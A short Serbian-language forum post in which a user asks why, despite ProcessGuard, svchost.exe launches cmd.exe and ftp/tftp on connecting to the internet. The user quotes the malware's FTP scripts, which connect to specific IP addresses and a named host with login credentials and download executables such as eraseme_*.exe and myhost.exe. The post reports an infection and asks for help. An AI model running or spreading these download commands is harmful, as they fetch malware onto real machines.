evo jedno pitanjce
naime koristim processguard da bih se zastitio od ovih hardcore trojana ali pored nekih ispitivanje izgleda da je ostao neki njihov deo
kad se konektujem na net svchost.exe pokrece cmd.exe sa nekim komandama i stvara file imena i ili qaz u system32 i otvara ftp.exe ili tftp.exe ucitavajuci komandame iz ovih file-ova.
sadrzaj file i je promenlji ali uglavno je slican ovome
open 195.252.84.90 19736
user 1 1
get eraseme_43238.exe
quit
ili
open 195.252.126.254 1331
user 1 1
get eraseme_53107.exe
quit
>file qaz
open xman.acid-burn.info 21
user ftplogx
ftpP4ssX
binary
get myhost.exe
bye
ako neko ima neko objasnjenje neka kaze!
bice imagea
poz